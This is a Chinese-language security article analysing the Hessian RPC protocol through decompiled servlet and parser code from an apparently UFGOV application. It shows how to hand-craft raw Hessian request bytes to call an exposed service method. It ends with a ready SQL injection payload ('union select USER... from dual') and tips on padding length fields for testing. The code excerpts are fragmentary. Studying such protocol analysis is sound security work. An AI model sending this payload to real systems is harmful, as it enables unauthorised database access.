Hessian是一个轻量级的remoting onhttp工具,使用简单的方法提供了RMI的功能。 相比WebService,Hessian更简单、快捷。采用的是二进制RPC协议,因为采用的是二进制协议,所以它很适合于发送二进制数据。
protected void service(HttpServletRequest var1, HttpServletResponse var2) throws ServletException, IOException {
String var3 = var1.getRequestURI();
int var4 = var3.lastIndexOf("/");
if(var4 > 0) {
var3 = var3.substring(var4 + 1);
if(!var1.getMethod().equals("POST")) {
var2.setStatus(500, "Hessian Requires POST");
PrintWriter var16 = var2.getWriter();
var16.println("<h1>Hessian Requires POST</h1>");
} else {
try {
ServletInputStream var7 = var1.getInputStream();
ServletOutputStream var8 = var2.getOutputStream();
int var9 = var7.read();
int var10;
int var11;
Object var12;
Object var13;
if(var9 == 72) {
var10 = var7.read();
var11 = var7.read();
if(var10 != 2 || var11 != 0) {
throw new IOException("Version " + var10 + "." + var11 + " is not understood");
var12 = this.createHessian2Input(var7);
var13 = new Hessian2Output(var8);
} else {
if(var9 != 99) {
throw new IOException("expected \'H\' (Hessian 2.0) or \'c\' (Hessian 1.0) in hessian input at " + var9);
var10 = var7.read();
var11 = var7.read();
var12 = new HessianInput(var7);
if(var10 >= 2) {
var13 = new Hessian2Output(var8);
} else {
var13 = new HessianOutput(var8);
SerializerFactory var14 = this.getSerializerFactory();
this.getSkeletonByServiceId(var3).invoke((AbstractHessianInput)var12, (AbstractHessianOutput)var13);
} catch (Throwable var15) {
throw new ServletException(var15);
int var9 = var7.read();
如果这个值得ascii码为72,也就是H,紧接着又读取了两个字符,如果这两个字符的ascii不等于2或者0,那么直接就走进了反序列化逻辑var12 = this.createHessian2Input(var7); var13 = new Hessian2Output(var8);
这里存在rec漏洞,不是我们今天要讲解的,漏洞可以参考:https://github.com/mbechler/marshalsec 里面对于hessian的反序列化
int var9 = var7.read();
如果这个值得ascii码为99,也就是c,然后再连读两个字符,从这里看出来并没有实际意义,分析为占位符,此时的post数据可以假定为c11,初始化了hessian的上下文:SerializerFactory var14 = this.getSerializerFactory(); ((AbstractHessianInput)var12).setSerializerFactory(var14); ((AbstractHessianOutput)var13).setSerializerFactory(var14);
private HessianSkeleton getSkeletonByServiceId(String var1) { HessianSkeleton var2 = (HessianSkeleton)this.skeletons.get(var1); if(var2 != null) { return var2; } else { Object var3 = ApplusContext.getBean(var1); var2 = new HessianSkeleton(var3, var3.getClass()); this.skeletons.put(var1, var2); return var2; } }
String var3 = var1.getRequestURI()
<?xml version="1.0" encoding="UTF-8"?> <!-- - Application context definition for JPetStore's business layer. - Contains bean references to the transaction manager and to the DAOs in - dataAccessContext-local/jta.xml (see web.xml's "contextConfigLocation"). --> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:aop="http://www.springframework.org/schema/aop" xmlns:tx="http://www.springframework.org/schema/tx" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-2.0.xsd http://www.springframework.org/schema/tx http://www.springframework.org/schema/tx/spring-tx-2.0.xsd http://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop-2.0.xsd"> <!-- hessian服务通过spring暴露出去 --> <bean id ="EncryptService.hessian" class ="com.ufgov.admin.license.svc.EncryptServiceImpl"> </bean> </beans>
public static Object getBean(String var0) { Object var1 = threadLocal.get(); if(var1 != null && var1 instanceof Long) { Long var2 = (Long)var1; Bundle var3 = Activator.getInstance().getBundleContext().getBundle(var2.longValue()); ApplicationContext var4 = getApplicationContext(var3.getSymbolicName()); if(var4 == null) { var4 = (ApplicationContext)applicationContexts.get(var1); } if(var4 != null) { try { return var4.getBean(var0); } catch (Throwable var5) { ; } } return getBeanFromRequiredBundles(var0, new ArrayList(), var3); } else { return null; } }
,当然了这个里面存在了所有的对外接口,不做分析,直接看数据包的结构,跟进invoke函数:public void invoke(Object service, AbstractHessianInput in, AbstractHessianOutput out) throws Exception { ServiceContext context = ServiceContext.getContext(); in.skipOptionalCall(); String header; while((header = in.readHeader()) != null) { Object methodName = in.readObject(); context.addHeader(header, methodName); } String var14 = in.readMethod(); int argLength = in.readMethodArgLength(); Method method = this.getMethod(var14 + "__" + argLength); if(method == null) { method = this.getMethod(var14); } if(method == null) { out.writeFault("NoSuchMethodException", "The service has no method named: " + in.getMethod(), (Object)null); out.close(); } else if("_hessian_getAttribute".equals(var14)) { String var15 = in.readString(); in.completeCall(); String var16 = null; if("java.api.class".equals(var15)) { var16 = this.getAPIClassName(); } else if("java.home.class".equals(var15)) { var16 = this.getHomeClassName(); } else if("java.object.class".equals(var15)) { var16 = this.getObjectClassName(); } out.writeReply(var16); out.close(); } else { Class[] args = method.getParameterTypes(); if(argLength != args.length && argLength >= 0) { out.writeFault("NoSuchMethod", "method " + method + " argument length mismatch, received length=" + argLength, (Object)null); out.close(); } else { Object[] values = new Object[args.length]; for(int result = 0; result < args.length; ++result) { values[result] = in.readObject(args[result]); } Object var17 = null; try { var17 = method.invoke(service, values); } catch (Throwable var13) { Throwable e = var13; if(var13 instanceof InvocationTargetException) { e = ((InvocationTargetException)var13).getTargetException(); } log.log(Level.FINE, this + " " + e.toString(), e); out.writeFault("ServiceException", e.getMessage(), e); out.close(); return; } in.completeCall(); out.writeReply(var17); out.close(); } } }
public String readMethod() throws IOException { int tag = this.read(); if(tag != 109) { throw this.error("expected hessian method (\'m\') at " + this.codeName(tag)); } else { int d1 = this.read(); int d2 = this.read(); this._isLastChunk = true; this._chunkLength = d1 * 256 + d2; this._sbuf.setLength(0); int ch; while((ch = this.parseChar()) >= 0) { this._sbuf.append((char)ch); } this._method = this._sbuf.toString(); return this._method; } }
从这里可以看出来,获取接口里面函数的方法字符为ascii为109 也就是m,这时候的post为c12m,然后继续再读取两个字符,用他的ascii码了通过计算一个长度,并取得后面的字符串,我们假设方法为getmodelCodeInfo,那么m后面的两个字符算出来要是个16长度最后才能返回getmodelCodeInfo
如果d1为0x00字符,d2 为0x10,这样就是一个十六,那么此时的post为c12m%00%10getmodelCodeInfo
Method method = this.getMethod(var14 + "__" + argLength);
protected AbstractSkeleton(Class apiClass) { this._apiClass = apiClass; Method[] methodList = apiClass.getMethods(); for(int i = 0; i < methodList.length; ++i) { Method method = methodList[i]; if(this._methodMap.get(method.getName()) == null) { this._methodMap.put(method.getName(), methodList[i]); } Class[] param = method.getParameterTypes(); String mangledName = method.getName() + "__" + param.length; this._methodMap.put(mangledName, methodList[i]); this._methodMap.put(mangleName(method, false), methodList[i]); } }
var17 = method.invoke(service, values);
直接进行了反射调用,后面就是读取以后的参数字符串public Object readObject() throws IOException { int tag = this.read(); String type; int type1; switch(tag) { case 66: case 98: this._isLastChunk = tag == 66; this._chunkLength = (this.read() << 8) + this.read(); ByteArrayOutputStream url2 = new ByteArrayOutputStream(); while((type1 = this.parseByte()) >= 0) { url2.write(type1); } return url2.toByteArray(); case 68: return new Double(this.parseDouble()); case 70: return Boolean.valueOf(false); case 73: return new Integer(this.parseInt()); case 76: return new Long(this.parseLong()); case 77: type = this.readType(); return this._serializerFactory.readMap(this, type); case 78: return null; case 82: type1 = this.parseInt(); return this._refs.get(type1); case 83: case 115: this._isLastChunk = tag == 83; this._chunkLength = (this.read() << 8) + this.read(); this._sbuf.setLength(0); while((type1 = this.parseChar()) >= 0) { this._sbuf.append((char)type1); } return this._sbuf.toString(); case 84: return Boolean.valueOf(true); case 86: type = this.readType(); int url1 = this.readLength(); return this._serializerFactory.readList(this, url1, type); case 88: case 120: this._isLastChunk = tag == 88; this._chunkLength = (this.read() << 8) + this.read(); return this.parseXML(); case 100: return new Date(this.parseLong()); case 114: type = this.readType(); String url = this.readString(); return this.resolveRemote(type, url); default: throw this.error("unknown code for readObject at " + this.codeName(tag)); } }
这里这里我们选择asiic为83的而不选择115 因为两个逻辑等级,因为后面的parseChar有问题
private int parseChar() throws IOException { while(this._chunkLength <= 0) { if(this._isLastChunk) { return -1; } int code = this.read(); switch(code) { case 83: case 88: this._isLastChunk = true; this._chunkLength = (this.read() << 8) + this.read(); break; case 115: case 120: this._isLastChunk = false; this._chunkLength = (this.read() << 8) + this.read(); break; default: throw this.expect("string", code); } } --this._chunkLength; return this.parseUTF8Char(); }
如果是83 那么久说明标志位结束了,整个语句结束的所有标志位:
public void readEnd() throws IOException { int code = this.read(); if(code != 122) { throw this.error("unknown code at " + this.codeName(code)); } }
c12m%00%10getmodelCodeInfoS%0081’ union select USER,NULL,NULL,NULL,NULL from dual – sdz
- hessian结构的要严格限制序列化和反序列化操作,以官方最新版本为主
- 正常的构造请求包,修改参数值,相对应的要去修改对应的步长,不管数据结构有多复杂,不管是字符型,数字型,对象型,最终的解释都落在值上,只需要修改被测试的值前面的步长大于等于payload长度,多出来的字符可以用空格替代或者任意字符,比如注入可以用注释,然后多出来的就任意字符占位即可